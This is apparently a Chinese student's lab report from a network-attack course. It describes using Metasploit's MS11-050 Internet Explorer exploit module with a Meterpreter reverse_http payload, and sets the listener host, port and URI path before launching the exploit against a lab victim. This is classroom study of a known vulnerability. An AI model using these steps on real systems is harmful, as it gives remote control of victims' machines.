20145333茹翔 Exp5 MS11_050

20145333茹翔 Exp5 MS11_050

实验过程

  • 使用命令msfconsole命令进入控制台

  • 使用命令search ms11_050查看针对MS11_050漏洞的攻击模块

    20145333茹翔 Exp5 MS11_050

  • 确定相应模块名之后,我们使用该模块。使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement进入模块

  • 使用命令info查看该模块的具体信息

    20145333茹翔 Exp5 MS11_050

  • 设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令set payloads windows/meterpreter/reverse_http

  • 使用show options 查看具体参数设置

    20145333茹翔 Exp5 MS11_050

  • 设置其相关参数

      set LHOST 192.168.31.177
    set LPORT 5333
    set URIPATH 20145333RX
  • 使用命令exploit攻击,等待连接,漏洞主机访问该ip,被攻击主机打开病毒网址效果为:

    20145333茹翔 Exp5 MS11_050

上一篇:使用Flexible实现手淘H5页面的终端适配


下一篇:20145333茹翔《网络对抗》Exp9 Web安全基础实践